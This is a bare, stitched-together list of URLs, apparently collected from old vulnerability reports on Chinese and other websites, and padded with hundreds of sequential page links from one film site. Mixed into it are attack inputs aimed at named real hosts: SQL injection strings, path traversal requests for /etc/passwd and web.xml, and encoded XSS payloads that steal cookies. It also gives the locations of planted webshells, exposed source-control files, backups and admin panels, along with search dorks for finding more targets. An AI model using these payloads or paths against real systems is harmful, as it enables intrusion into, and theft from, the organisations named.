http://www.xingechina.com:80/admin/ http://tj.tieyou.com/index.php?param=/notice/detail&id=34 http://union.tieyou.com/index.php?param=/notice/detail&id=26 https://mail.ehicar.com http://i.links.cn/subdomain/ http://appmarket.kingdee.com/。 http://appmarket.kingdee.com/3.txt中发下如下root口令: http://202.108.15.130:7777/mx_antispam/ http://202.108.15.130:7777/mx_antispam/database_backup/ http://202.108.15.130:7777/mx_antispam/log/ http://202.108.15.130:7777/mx_antispam/php_exec/ http://202.108.15.130:7777/mx_antispam/php_exec/display_result_antispam.php http://product.news.sohu.com/ml/cms/pic_edit.php?id=012003%20and%201=2%20union%20select%201,2,user%28%29,4,5,6,7,8,9,10,11,12,13,14 http://zuoye.51taoshi.com/homework/html/.svn/entries http://tsh.51taoshi.com/tsh/.svn/entries http://school.51taoshi.com/school/.svn/entries http://www.crreg.com.cn/xmjs.aspx?id=38 http://opinion.chinabyte.com//.svn/entries http://minisite.youku.com/autobaojun/ http://book.hinews.cn/list.php?caid=27 http://bbs.wacai.com/thread-127071-3-1.html 
http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash https://www.cmi.chinamobile.com/CPortal/web/web!changeLanguage.action ka.tgbus.com/Search.aspx?k=梦幻卡修 http://zone.pptv.com/molicui/works/getone?id=1285 http://zone.pptv.com/molicui/works/getone?id=1285 http://zone.pptv.com/molicui/works/getone?id=1285 http://www.chinabidding.com.cn/zbw/zbxx/zbgg/sbiao_tj.jsp http://count.hjsm.tom.com/hjsmadmin/admin/test.php http://count.hjsm.tom.com/hjsmadmin/admin/login.php http://sms.tom.com/sms_admin/index.html http://rpc.task.duowan.com/ http://xiu.56.com/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://ued.ctrip.com/blog/?author=1 http://ued.ctrip.com/blog/?author=55 http://ued.ctrip.com/blog/的用户名如下: http://ued.ctrip.com/blog/wp-login.php http://ued.ctrip.com/blog/ http://mail.yto.net.cn/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiaSBsb3ZlIGVtaW5lbSIpPC9zY3JpcHQ+ http://www.ymdj.com.cn/managejoyoung.jsp http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf http://www.xyhui.com/thumb.php?url=远程WEBSHELL文件地址?w=10&h=10 http://www.365tkt.com/?c=order2&a=index Alex-Mac:sqlmapproject-sqlmap-7054586 http://www.365tkt.com/?c=order2&a=index http://dl.powercdn.com/logdown/www.3158.com/www.3158.com_2013-12-01.tar.gz http://dl.powercdn.com/logdown/manages.3158.com/manages.3158.com_2013-12-01.tar.gz http://dl.powercdn.com/logdown/my.3158.com/my.3158.com_2013-12-01.tar.gz http://dl.powercdn.com/logdown/member.3158.com/member.3158.com_2013-12-01.tar.gz http://www.10jqka.com.cn/school.tar.gz http://361runner.hupu.com/recsites/default_marker/?p_id=1&city_id=321&dist_id=&type_id=11&searchKeywords='&tag=1&page=1&my_localtion=0&field_id=0 
http://soccer.hupu.com/live/match.php?id=2089&n=%E8%A5%BF%E7%8F%AD%E7%89%99-%20-%20-Tercera+Division-%20-%20-Rayo+Majadahonda-%20-%20-CD+Mostoles-%20-%20--%20-%20-%E6%91%A9%E6%96%AF%E5%9B%BE%E5%88%A9%E6%96%AF%E5%AE%A4%E5%86%85%E8%B6%B3%E7%90%83%E9%98%9F http://cloud.ecare365.com/admin/Index.htm http://www.d3fys.com/video/?82947-0-0.html发现有篡改路由器DNS的恶意行为 http://cbjs.baidu.com/js/o.js http://cb.baidu.com/ecom?di=820734&fn=BAIDU_CLB_SETJSONADSLOT&tpl=BAIDU_CLB_SETJSONADSLOT&asp_refer=&asp_url=http%3A%2F%2Fwww.d3fys.com%2Fvideo%2F%3F82947-0-0.html&new=8&fv=0&cn=1&if=0&word=asp_url&refer=&ready=1&jn=3&lmt=1385965762&csp=1920,1080&csn=1795,1080&ccd=24&chi=1&cja=false&cpl=17&cmi=23&cce=true&csl=zh-CN&did=6&rt=3&dt=1385965766&c01=0&prt=1385965763671&ps=1631x0&pcs=1280x746&pss=1280x1631&pis=1280x746&cec=gbk&dis=0&baidu_id= http://www.baidu.com/s?wd=%E6%AC%A2%E8%BF%8E%E4%BD%BF%E7%94%A8%E6%B5%99%E5%A4%A7%E6%81%A9%E7%89%B9&pn=0&rn=100&ie=utf-8 http://mail.expacta.com.cn/extmail/tmp/ http://117.79.80.24:8089/ http://redmine.corp.gfan.com:8080/ http://117.79.80.24:8088/ http://zhidao.baidu.com/prof/apply?step=2 http://global.kingdee.com/index.php?option=com_ninjarsssyndicator&feed_id=1&format=raw§ionid=20 http://xxx.eastmoney.com/xx/android/serverlist3.ini这地地址获取了东方财富网的服务器列表! 
http://forum.housetube.tw/ http://forum.housetube.tw/content.php?cid=112&tid=14033 http://www.norming.com/SinglePages/index?id=1 http://www.pkf-daxin.com/ess/Homepage.action http://erp.chncpa.cc/ess/Homepage.action http://erp.rhcncpa.com/ess/Homepage.action http://ts.iat-auto.com/ess/Homepage.action google:inurl:ess baidu:Norming http://www.zgfjdsw.org.cn/WebSearch.aspx?Keyword=1 http://127.0.0.1/v7/member/index.php?main=pm.php?job=send inurl:u-dsm/login.do http://123.15.54.36:8888/u-dsm/login.do http://jnunis.gicp.net:8085/u-dsm/login.do http://123.15.54.36:8888/u-dsm/shell.jsp http://jnunis.gicp.net:8085/u-dsm/shell.jsp http://sus.lenovomm.com/ http://sus.lenovomm.com http://web.7k7k.com/log.txt http://db.178.com/wow/cn/itemsets.html?su=496509 http://db.178.com/wow/cn/itemsets.html?qu=4 http://converse.56.com/movieshow/nr.php?vodid=3 http://converse.56.com/movieshow/nr.php?vodid=3 inurl:login/Cms.do http://www.xszbjyw.com/cms/login/cms.do http://www.energizepr.com/login/Cms.do http://www.gzrch.com/login/Cms.do http://www.xszbjyw.com/cms/login/cms.do http://www.energizepr.com/login/Cms.do http://www.gzrch.com/login/Cms.do http://www.energizepr.com/shell.jsp http://www.07073.com/plus/zt/index.php?model=20121205&f=personal&id=10569603 http://api.cheshi.com/services/mobile/api.php?api=mobile.wscs_v3.data&act=prd_info&v=3.1&provinceid=1&cityid=0&pid=33673 http://61.157.78.102/shell.jsp http://rslm.g.178.com/main.php?act=members&order=1 http://210.75.208.157/dsqk/dsqkManage.jsp http://210.75.208.157/information/lm_list.jsp?code=xueshuyuandi_%27AND%201=1 http://www.huizhou.gov.cn http://www.huizhou.gov.cn/download.shtml?file=../../../../../../etc/passwd http://spa.changhong.com/sysadmin/index.asp http://wo.07073.com/wo/index.php?con=page&action=soft&do=getListAjax&type=5 http://pc.07073.com/sims3/zhinan/1161.html http://0.openapi2.qfpay.com/trade/v1/tradelist http://dg.tgbus.com/Search.aspx?extname=bmp&typeid=0&app=1 http://dg.tgbus.com/Search.aspx?extname=bmp 
http://dg.tgbus.com/Search.aspx?extname=bmp http://sdk.zuche.com/CARSDK/services/zuche1 http://sdk.zuche.com/CARSDK/services/zuche1?UpdateUser http://218.206.166.106/lyxt/show.aspx?titleid=39275 http://www.97zh.com/ http://www.97zh.com/admin/fckeditor/editor/filemanager/connectors/test.html http://huodong.gw.com.cn/gold230/detail.php?type=all&id=111 http://www.bfa.gov.cn/ http://www.bfa.gov.cn/login/loginAction!loginsc.dhtml www.koolearn.com http://www.rapoo.cn/NewsCenter.aspx?TID=1没有对参数TID进行过滤导致sql注入。sa权限,可getshell,执行任意命令。 http://www.target.com/siteserver/platform/background_dbSqlQuery.aspx?Table=bairong_CloudStorage&TableID=533576939&DatabaseName=siteserver ldj.jiangmen.gov.cn/uploadfile/2013/0917/20130917095143244.xls http://www.bjpost.com.cn/PostOfficeAction!querybyxzq.action?xzqid=3 http://www.camel.com.cn/myorderdetail.aspx?soid=150 http://musicopen.baidu.com/index.php?c=openuser&m=createCompany&tn=openuser_step2 http://musicopen.baidu.com/index.php?c=openuser&m=createCompany&tn=openuser_step3就把第二步给绕过去直接进入第三步! 
dynamic.i.xunlei.com/ajax?c=user&a=myvip&callback= http://www.njgwy.gov.cn/gwyLoginAction.action http://www.hd-hotel.com.cn/inc/aspxspy.aspx http://www.btfly.com.cn/admin/Login.asp http://www.huidenet.net www.nmgcy.org.cn http://dts.gw.com.cn/ http://bj.evergrande.com/index.html http://www.yals.gov.cn/Website.zip http://www.gw.com.cn/tzzgx/zixun.php http://log.gw.com.cn http://mo.gw.com.cn/iNewsDetailHtml.php?pageurl=../../../../../../../../../../etc/passwd http://passport.meituan.com/account/check http://secure.verycd.com/ http://v.dahe.cn http://v.dahe.cn/includes/shinyv/increase.php?id=3003&option=com_content http://v.dahe.cn/includes/shinyv/increase.p http://sqlmap.org http://account.nau.edu.cn/admin/ http://crm.tv.tcl.com/DRP/login.action http://cp.ip66.com/hr.php?id=8 http://www.skyexam.com/InfoModel/DownLoadInfoSee.aspx?PKId=264 http://mo.gw.com.cn/admin/login.php http://mo.gw.com.cn/search.php?mobile=kk http://mo.gw.com.cn/type.php?brand=366&typeid=1528 http://job.gw.com.cn/admin/login.php http://eip.tcl.com/initNDSPassword/ModifyNDSPwd.aspx http://www.51cto.com/1.php http://www.51cto.com/mysql.php http://epaper.nsbd.cn/ http://client.hiad365.com http://caservice.hiad365.com http://test.hiad365.com:8086 http://test.hiad365.com:8086 http://www.basha.com.cn/GiftExchange/Result.aspx?s=xxxxxx http://app.clubwanda.com.cn http://www.physics.fudan.edu.cn/tps/sites/phygsu/newtest/editor/admin_uploadfile.asp?id=14&dir=../ http://211.103.182.73:7100/bgpc_carstock_2010/ http://211.103.182.73:7100/bgpc_carstock_2010/qtbul/showBulContent.action http://dev.56.com/wiki/index.php?user-getpass-1.html http://e.189.cn/一个天翼用户中心····好像是新出的。这个是后话了···找回密码 http://www.alskfqgtj.gov.cn/admin/ http://www.alskfqgtj.gov.cn/upFiles/infoImg/no22.asp http://xxdl.gw.com.cn http://xxdl.gw.com.cn/admin http://xxdl.gw.com.cn/marketIframe.jsp?type=0 http://www.csvanke.com http://www.csvanke.com/index.php/csvk_listed4/id/351 http://58.213.112.246:88/hospitalQC/login2.jsp 
http://baike.aoshu.com/k/gInit?id=14342&t=star&ip=202.118.239.18,%20127.0.0.1&sid=3&star= http://110.1.1.21/ShareSmpp/sendsms.do?from=18638384388&to=10010&msg=101 http://211.151.111.117/ http://61.139.73.103/ http://124.127.255.54/lim/index.php http://124.127.255.194/Authencation/login.aspx http://124.127.255.194/Authencation/login.aspx http://bbs.tga.plu.cn。论坛有个竞猜插件,存在sql注入。 tgabet:official&view=bet&gid=324 http://k.dagexing.com/userfeed?start=0&uid=186464&clienttype=1&num=1&version=1 http://k.dagexing.com/getsonginfo?clienttype=1&siid=a46331775590&version=1&clientversion=1210 http://tieba.baidu.com/home/main?un=%B3%AC%D4%BD%C3%CE%CF%EB92&fr=pb https://123.232.119.126 SID:smesddb http://files.smesd.gov.cn/file/2013/9/4/u171/1uV113484906C90F9A62C81C9B73AE45184AFA5CF7A7.txt http://gtao.me/waimai/Default.aspx?pc=wdk&city=beijing http://www.chinawestair.com/backend/extraProduct/QueryItineraryOrder.action http://www.chinawestair.com/backend/partner/partnermanage.action http://slo.zqgame.com/NewsEvents.html?category_id=30 http://payment.baihe.com/baiheQueryZJSAction.do?orderId=1309172401137023 http://zgqx.zqgame.com/Main/ListPage.aspx?type=news http://www.baidu.com/s?wd=site%3Accw.com.cn++%E5%8D%9A%E5%BD%A9&rsv_bp=0&ch=&tn=snxs_pg&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=21&rsv_sug1=17&rsv_sug4=423&rsv_sug=0&inputT=7015 http://www.changansuzuki.com/ http://support.gw.com.cn/data_serve/setpasswd.php?dotype=html http://www.bensonfund.com/admin_system/UPFile.php http://www.bensonfund.com/admin_system/uplodeimg/1386229596.php http://www.cppcc.gov.cn:8090/gate/big5/www.cppcc.gov.cn/CMS/tianxuandeng/goQueryPageTiAnXuanDeng.action http://xuexiao.eol.cn/youeryuan/chengdu/dongtai_detail.php?dongtaiid=19 http://www.gz-l-tax.gov.cn/conn.jsp http://www.gz-l-tax.gov.cn/search.jsp http://s8test.super8.com.cn/FrontEndSystem/Main/BLUE/login.aspx http://dzlzw.gov.cn http://house.xizi.com/index.php?m=agent&c=agent&a=sale&uid=2066220 http://house.xizi.com/esf/rent&areaid=146 
http://so.xizi.com/thread.php?fid=13&topicsearch=1&modelid=82&searchname[350][min]=100000%20and%20ord%28mid%28user%28%29,1,1%29%29=114%20&searchname[353]= http://bbs.xizi.com/xz_newshow.php?action=activity&type=3 http://bbs.xizi.com/xz_newshow.php?action=activity&fidalias=47 http://coolpad.anzhuo.cn http://coolpad.anzhuo.cn/rank.php?keyword=&mt=1 http://coolpad.anzhuo.cn/rank.php?keyword=& http://sqlmap.org http://dkp.178.com/?gid=119085&_action=search&_app=dkp&_controller=members http://dkp.178.com:80/ http://gyc.hd.gov.cn/M_Rcqz_View.aspx?ID=000011 www.leyou.com.cn http://www.leyou.com.cn:80/ www.leyou.com.cn https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword http://battery.tcl.com/read_news.php?id=27 http://battery.tcl.com/read_products2.php?id=59 http://jobs.tcl.com/career/indexList.view?mask=4 http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 http://www.yhachina.com/topic.php?channelID=6 http://www.yhachina.com/lvshe/index.php?action=login http://publish.linkphone.cn/index.php?m=admin&c=index&a=login&pc_hash= http://www.linkphone.cn/phpsso_server/?m=admin&c=login&a=init&forward= http://whois.chinaz.com/51cto.com http://whois.chinaz.com/linkphone.cn http://whois.chinaz.com/cioage.com http://whois.chinaz.com/watchstor.com http://whois.chinaz.com/hc3i.cn http://e.weibo.com/watchstor http://www.joboto.com/ http://www.fcrs.gov.cn/admin/ad_login.asp http://www.target.com/siteserver/cms/background_contentsGroup.aspx?publishmentSystemID=1&contentGroupName=test'%20and%201=@@version%20and%201='1 http://auto.xizi.com/index.php?m=dealer&c=index&a=shop_products&did=30 http://to.xizi.com/index.php?m=discount&c=index&a=init&areaid=0&classid=0 http://aligooo.x9.fjjsp.net http://aligooo.x9.fjjsp.net/cp.cn?pm=c http://www.cfc108.com/zxjt/YYBModelOne.action http://www.amwaynet.com.cn/onlineTESys/downloadUtil.jsp?fileName=../WEB-INF/web.xml&saveName=web.xml 
http://house.xizi.com/index.php?m=agent&c=outlet&a=init&aid=123&t=sale http://uc.xizi.com/avatar.php?uid= http://home.xizi.com/index.php?m=company&c=index&a=init&cid=10 http://185.10.107.68:423/ http://185.10.107.68:421/ http://185.10.107.69:421/ http://185.10.107.69:423/ http://v21.56.com/.svn/entries svn://svn.56.com/upload_video svn://svn.56.com svn:special svn:externals svn:needs-lock http://v21.56.com/flv_action_img.php v21.56.com/flv_screenshot_get_img.php?code=b711782d97444b560874cc93581bfbae&img=http://xxx/1.txt&size=65&path=ss.php https://github.com/sunbiz/dhis2-10811 http://www.google.de/#newwindow=1&q=inurl:dhis-web-commons http://dhis.nrhmodisha.in/dhis-web-commons/security/login.action?failed=true http://50.116.20.202:8080/dhis/dhis-web-commons/security/login.action http://service.dghs.gov.bd:8080/mishealth/dhis-web-commons/security/login.action http://ehr.tcl.com http://ehr.tcl.com/ehr http://ehr.tcl.com/ehr http://sqlmap.org http://125.39.193.136/ http://125.39.193.136/userHeadImg/2013/12/06/cd.jsp http://sale.jd.com/act/lIpnyuVZck8vDUaR.html?erpad_source=erpad http://www.informatization.gov.cn/cateinfo.action http://wooyun.org/bugs/wooyun-2010-023688 http://www.tjsafety.gov.cn/admin/admin_login.aspx http://www.tjsafety.gov.cn:80/count.rar http://www.tjsafety.gov.cn/admin/admin_login.aspx http://www.m1905.com/ftp/bjl/711237.shtml display:none http://www.1feel.com http://www.tsrsj.gov.cn/ http://www.tsrsj.gov.cn/ http://www.tsrsj.gov.cn/ http://www.m1905.com/ftp/com2/index.asp http://www.m1905.com/ftp/com3/aibodi.asp http://www.m1905.com/ftp/com4/index.asp http://www.m1905.com/ftp/com1/html/index.html http://www.m1905.com/ftp/com1/html/page_2.html http://www.m1905.com/ftp/com1/html/page_3.html http://www.m1905.com/ftp/com1/html/page_4.html http://www.m1905.com/ftp/com1/html/page_5.html http://www.m1905.com/ftp/com1/html/page_6.html http://www.m1905.com/ftp/com1/html/page_7.html http://www.m1905.com/ftp/com1/html/page_8.html 
http://www.m1905.com/ftp/com1/html/0.html http://www.m1905.com/ftp/com1/html/1.html http://www.m1905.com/ftp/com1/html/2.html http://www.m1905.com/ftp/com1/html/3.html http://www.m1905.com/ftp/com1/html/4.html http://www.m1905.com/ftp/com1/html/5.html http://www.m1905.com/ftp/com1/html/6.html http://www.m1905.com/ftp/com1/html/7.html http://www.m1905.com/ftp/com1/html/8.html http://www.m1905.com/ftp/com1/html/9.html http://www.m1905.com/ftp/com1/html/10.html http://www.m1905.com/ftp/com1/html/11.html http://www.m1905.com/ftp/com1/html/12.html http://www.m1905.com/ftp/com1/html/13.html http://www.m1905.com/ftp/com1/html/14.html http://www.m1905.com/ftp/com1/html/15.html http://www.m1905.com/ftp/com1/html/16.html http://www.m1905.com/ftp/com1/html/17.html http://www.m1905.com/ftp/com1/html/18.html http://www.m1905.com/ftp/com1/html/19.html http://www.m1905.com/ftp/com1/html/20.html http://www.m1905.com/ftp/com1/html/21.html http://www.m1905.com/ftp/com1/html/22.html http://www.m1905.com/ftp/com1/html/23.html http://www.m1905.com/ftp/com1/html/24.html http://www.m1905.com/ftp/com1/html/25.html http://www.m1905.com/ftp/com1/html/26.html http://www.m1905.com/ftp/com1/html/27.html http://www.m1905.com/ftp/com1/html/28.html http://www.m1905.com/ftp/com1/html/29.html http://www.m1905.com/ftp/com1/html/30.html http://www.m1905.com/ftp/com1/html/31.html http://www.m1905.com/ftp/com1/html/32.html http://www.m1905.com/ftp/com1/html/33.html http://www.m1905.com/ftp/com1/html/34.html http://www.m1905.com/ftp/com1/html/35.html http://www.m1905.com/ftp/com1/html/36.html http://www.m1905.com/ftp/com1/html/37.html http://www.m1905.com/ftp/com1/html/38.html http://www.m1905.com/ftp/com1/html/39.html http://www.m1905.com/ftp/com1/html/40.html http://www.m1905.com/ftp/com1/html/41.html http://www.m1905.com/ftp/com1/html/42.html http://www.m1905.com/ftp/com1/html/43.html http://www.m1905.com/ftp/com1/html/44.html http://www.m1905.com/ftp/com1/html/45.html 
http://www.m1905.com/ftp/com1/html/46.html http://www.m1905.com/ftp/com1/html/47.html http://www.m1905.com/ftp/com1/html/48.html http://www.m1905.com/ftp/com1/html/49.html http://www.m1905.com/ftp/com1/html/50.html http://www.m1905.com/ftp/com1/html/51.html http://www.m1905.com/ftp/com1/html/52.html http://www.m1905.com/ftp/com1/html/53.html http://www.m1905.com/ftp/com1/html/54.html http://www.m1905.com/ftp/com1/html/55.html http://www.m1905.com/ftp/com1/html/56.html http://www.m1905.com/ftp/com1/html/57.html http://www.m1905.com/ftp/com1/html/58.html http://www.m1905.com/ftp/com1/html/59.html http://www.m1905.com/ftp/com1/html/60.html http://www.m1905.com/ftp/com1/html/61.html http://www.m1905.com/ftp/com1/html/62.html http://www.m1905.com/ftp/com1/html/63.html http://www.m1905.com/ftp/com1/html/64.html http://www.m1905.com/ftp/com1/html/65.html http://www.m1905.com/ftp/com1/html/66.html http://www.m1905.com/ftp/com1/html/67.html http://www.m1905.com/ftp/com1/html/68.html http://www.m1905.com/ftp/com1/html/69.html http://www.m1905.com/ftp/com1/html/70.html http://www.m1905.com/ftp/com1/html/71.html http://www.m1905.com/ftp/com1/html/72.html http://www.m1905.com/ftp/com1/html/73.html http://www.m1905.com/ftp/com1/html/74.html http://www.m1905.com/ftp/com1/html/75.html http://www.m1905.com/ftp/com1/html/76.html http://www.m1905.com/ftp/com1/html/77.html http://www.m1905.com/ftp/com1/html/78.html http://www.m1905.com/ftp/com1/html/79.html http://www.m1905.com/ftp/com1/html/80.html http://www.m1905.com/ftp/com1/html/81.html http://www.m1905.com/ftp/com1/html/82.html http://www.m1905.com/ftp/com1/html/83.html http://www.m1905.com/ftp/com1/html/84.html http://www.m1905.com/ftp/com1/html/85.html http://www.m1905.com/ftp/com1/html/86.html http://www.m1905.com/ftp/com1/html/87.html http://www.m1905.com/ftp/com1/html/88.html http://www.m1905.com/ftp/com1/html/89.html http://www.m1905.com/ftp/com1/html/90.html http://www.m1905.com/ftp/com1/html/91.html 
http://www.m1905.com/ftp/com1/html/92.html http://www.m1905.com/ftp/com1/html/93.html http://www.m1905.com/ftp/com1/html/94.html http://www.m1905.com/ftp/com1/html/95.html http://www.m1905.com/ftp/com1/html/96.html http://www.m1905.com/ftp/com1/html/97.html http://www.m1905.com/ftp/com1/html/98.html http://www.m1905.com/ftp/com1/html/99.html http://www.m1905.com/ftp/com1/html/100.html http://www.m1905.com/ftp/com1/html/101.html http://www.m1905.com/ftp/com1/html/102.html http://www.m1905.com/ftp/com1/html/103.html http://www.m1905.com/ftp/com1/html/104.html http://www.m1905.com/ftp/com1/html/105.html http://www.m1905.com/ftp/com1/html/106.html http://www.m1905.com/ftp/com1/html/107.html http://www.m1905.com/ftp/com1/html/108.html http://www.m1905.com/ftp/com1/html/109.html http://www.m1905.com/ftp/com1/html/110.html http://www.m1905.com/ftp/com1/html/111.html http://www.m1905.com/ftp/com1/html/112.html http://www.m1905.com/ftp/com1/html/113.html http://www.m1905.com/ftp/com1/html/114.html http://www.m1905.com/ftp/com1/html/115.html http://www.m1905.com/ftp/com1/html/116.html http://www.m1905.com/ftp/com1/html/117.html http://www.m1905.com/ftp/com1/html/118.html http://www.m1905.com/ftp/com1/html/119.html http://www.m1905.com/ftp/com1/html/120.html http://www.m1905.com/ftp/com1/html/121.html http://www.m1905.com/ftp/com1/html/122.html http://www.m1905.com/ftp/com1/html/123.html http://www.m1905.com/ftp/com1/html/124.html http://www.m1905.com/ftp/com1/html/125.html http://www.m1905.com/ftp/com1/html/126.html http://www.m1905.com/ftp/com1/html/127.html http://www.m1905.com/ftp/com1/html/128.html http://www.m1905.com/ftp/com1/html/129.html http://www.m1905.com/ftp/com1/html/130.html http://www.m1905.com/ftp/com1/html/131.html http://www.m1905.com/ftp/com1/html/132.html http://www.m1905.com/ftp/com1/html/133.html http://www.m1905.com/ftp/com1/html/134.html http://www.m1905.com/ftp/com1/html/135.html http://www.m1905.com/ftp/com1/html/136.html 
http://www.m1905.com/ftp/com1/html/137.html http://www.m1905.com/ftp/com1/html/138.html http://www.m1905.com/ftp/com1/html/139.html http://www.m1905.com/ftp/com1/html/140.html http://www.m1905.com/ftp/com1/html/141.html http://www.m1905.com/ftp/com1/html/142.html http://www.m1905.com/ftp/com1/html/143.html http://www.m1905.com/ftp/com1/html/144.html http://www.m1905.com/ftp/com1/html/145.html http://www.m1905.com/ftp/com1/html/146.html http://www.m1905.com/ftp/com1/html/147.html http://www.m1905.com/ftp/com1/html/148.html http://www.m1905.com/ftp/com1/html/149.html http://www.m1905.com/ftp/com1/html/150.html http://www.m1905.com/ftp/com1/html/151.html http://www.m1905.com/ftp/com1/html/152.html http://www.m1905.com/ftp/com1/html/153.html http://www.m1905.com/ftp/com1/html/154.html http://www.m1905.com/ftp/com1/html/155.html http://www.m1905.com/ftp/com1/html/156.html http://www.m1905.com/ftp/com1/html/157.html http://www.m1905.com/ftp/com1/html/158.html http://www.m1905.com/ftp/com1/html/159.html http://www.m1905.com/ftp/com1/html/160.html http://www.m1905.com/ftp/com1/html/161.html http://www.m1905.com/ftp/com1/html/162.html http://www.m1905.com/ftp/com1/html/163.html http://www.m1905.com/ftp/com1/html/164.html http://www.m1905.com/ftp/com1/html/165.html http://www.m1905.com/ftp/com1/html/166.html http://www.m1905.com/ftp/com1/html/167.html http://www.m1905.com/ftp/com1/html/168.html http://www.m1905.com/ftp/com1/html/169.html http://www.m1905.com/ftp/com1/html/170.html http://www.m1905.com/ftp/com1/html/171.html http://www.m1905.com/ftp/com1/html/172.html http://www.m1905.com/ftp/com1/html/173.html http://www.m1905.com/ftp/com1/html/174.html http://www.m1905.com/ftp/com1/html/175.html http://www.m1905.com/ftp/com1/html/176.html http://www.m1905.com/ftp/com1/html/177.html http://www.m1905.com/ftp/com1/html/178.html http://www.m1905.com/ftp/com1/html/179.html http://www.m1905.com/ftp/com1/html/180.html http://www.m1905.com/ftp/com1/html/181.html 
http://www.m1905.com/ftp/com1/html/182.html http://www.m1905.com/ftp/com1/html/183.html http://www.m1905.com/ftp/com1/html/184.html http://www.m1905.com/ftp/com1/html/185.html http://www.m1905.com/ftp/com1/html/186.html http://www.m1905.com/ftp/com1/html/187.html http://www.m1905.com/ftp/com1/html/188.html http://www.m1905.com/ftp/com1/html/189.html http://www.m1905.com/ftp/com1/html/190.html http://www.m1905.com/ftp/com1/html/191.html http://www.m1905.com/ftp/com1/html/192.html http://www.m1905.com/ftp/com1/html/193.html http://www.m1905.com/ftp/com1/html/194.html http://www.m1905.com/ftp/com1/html/195.html http://www.m1905.com/ftp/com1/html/196.html http://www.m1905.com/ftp/com1/html/197.html http://www.m1905.com/ftp/com1/html/198.html http://www.m1905.com/ftp/com1/html/199.html http://www.m1905.com/ftp/com1/html/200.html http://www.m1905.com/ftp/com1/html/201.html http://www.m1905.com/ftp/com1/html/202.html http://www.m1905.com/ftp/com1/html/203.html http://www.m1905.com/ftp/com1/html/204.html http://www.m1905.com/ftp/com1/html/205.html http://www.m1905.com/ftp/com1/html/206.html http://www.m1905.com/ftp/com1/html/207.html http://www.m1905.com/ftp/com1/html/208.html http://www.m1905.com/ftp/com1/html/209.html http://www.m1905.com/ftp/com1/html/210.html http://www.m1905.com/ftp/com1/html/211.html http://www.m1905.com/ftp/com1/html/212.html http://www.m1905.com/ftp/com1/html/213.html http://www.m1905.com/ftp/com1/html/214.html http://www.m1905.com/ftp/com1/html/215.html http://www.m1905.com/ftp/com1/html/216.html http://www.m1905.com/ftp/com1/html/217.html http://www.m1905.com/ftp/com1/html/218.html http://www.m1905.com/ftp/com1/html/219.html http://www.m1905.com/ftp/com1/html/220.html http://www.m1905.com/ftp/com1/html/221.html http://www.m1905.com/ftp/com1/html/222.html http://www.m1905.com/ftp/com1/html/223.html http://www.m1905.com/ftp/com1/html/224.html http://www.m1905.com/ftp/com1/html/225.html http://www.m1905.com/ftp/com1/html/226.html 
http://www.m1905.com/ftp/com1/html/227.html http://www.m1905.com/ftp/com1/html/228.html http://www.m1905.com/ftp/com1/html/229.html http://www.m1905.com/ftp/com1/html/230.html http://www.m1905.com/ftp/com1/html/231.html http://www.m1905.com/ftp/com1/html/232.html http://www.m1905.com/ftp/com1/html/233.html http://www.m1905.com/ftp/com1/html/234.html http://www.m1905.com/ftp/com1/html/235.html http://www.m1905.com/ftp/com1/html/236.html http://www.m1905.com/ftp/com1/html/237.html http://www.m1905.com/ftp/com1/html/238.html http://www.m1905.com/ftp/com1/html/239.html http://www.m1905.com/ftp/com1/html/240.html http://www.m1905.com/ftp/com1/html/241.html http://www.m1905.com/ftp/com1/html/242.html http://www.m1905.com/ftp/com1/html/243.html http://www.m1905.com/ftp/com1/html/244.html http://www.m1905.com/ftp/com1/html/245.html http://www.m1905.com/ftp/com1/html/246.html http://www.m1905.com/ftp/com1/html/247.html http://www.m1905.com/ftp/com1/html/248.html http://www.m1905.com/ftp/com1/html/249.html http://www.m1905.com/ftp/com1/html/250.html http://www.m1905.com/ftp/com1/html/251.html http://www.m1905.com/ftp/com1/html/252.html http://www.m1905.com/ftp/com1/html/253.html http://www.m1905.com/ftp/com1/html/254.html http://www.m1905.com/ftp/com1/html/255.html http://www.m1905.com/ftp/com1/html/256.html http://www.m1905.com/ftp/com1/html/257.html http://www.m1905.com/ftp/com1/html/258.html http://www.m1905.com/ftp/com1/html/259.html http://www.m1905.com/ftp/com1/html/260.html http://www.m1905.com/ftp/com1/html/261.html http://www.m1905.com/ftp/com1/html/262.html http://www.m1905.com/ftp/com1/html/263.html http://www.m1905.com/ftp/com1/html/264.html http://www.m1905.com/ftp/com1/html/265.html http://www.m1905.com/ftp/com1/html/266.html http://www.m1905.com/ftp/com1/html/267.html http://www.m1905.com/ftp/com1/html/268.html http://www.m1905.com/ftp/com1/html/269.html http://www.m1905.com/ftp/com1/html/270.html http://www.m1905.com/ftp/com1/html/271.html 
http://www.m1905.com/ftp/com1/html/272.html http://www.m1905.com/ftp/com1/html/273.html http://www.m1905.com/ftp/com1/html/274.html http://www.m1905.com/ftp/com1/html/275.html http://www.m1905.com/ftp/com1/html/276.html http://www.m1905.com/ftp/com1/html/277.html http://www.m1905.com/ftp/com1/html/278.html http://www.m1905.com/ftp/com1/html/279.html http://www.m1905.com/ftp/com1/html/280.html http://www.m1905.com/ftp/com1/html/281.html http://www.m1905.com/ftp/com1/html/282.html http://www.m1905.com/ftp/com1/html/283.html http://www.m1905.com/ftp/com1/html/284.html http://www.m1905.com/ftp/com1/html/285.html http://www.m1905.com/ftp/com1/html/286.html http://www.m1905.com/ftp/com1/html/287.html http://www.m1905.com/ftp/com1/html/288.html http://www.m1905.com/ftp/com1/html/289.html http://www.m1905.com/ftp/com1/html/290.html http://www.m1905.com/ftp/com1/html/291.html http://www.m1905.com/ftp/com1/html/292.html http://www.m1905.com/ftp/com1/html/293.html 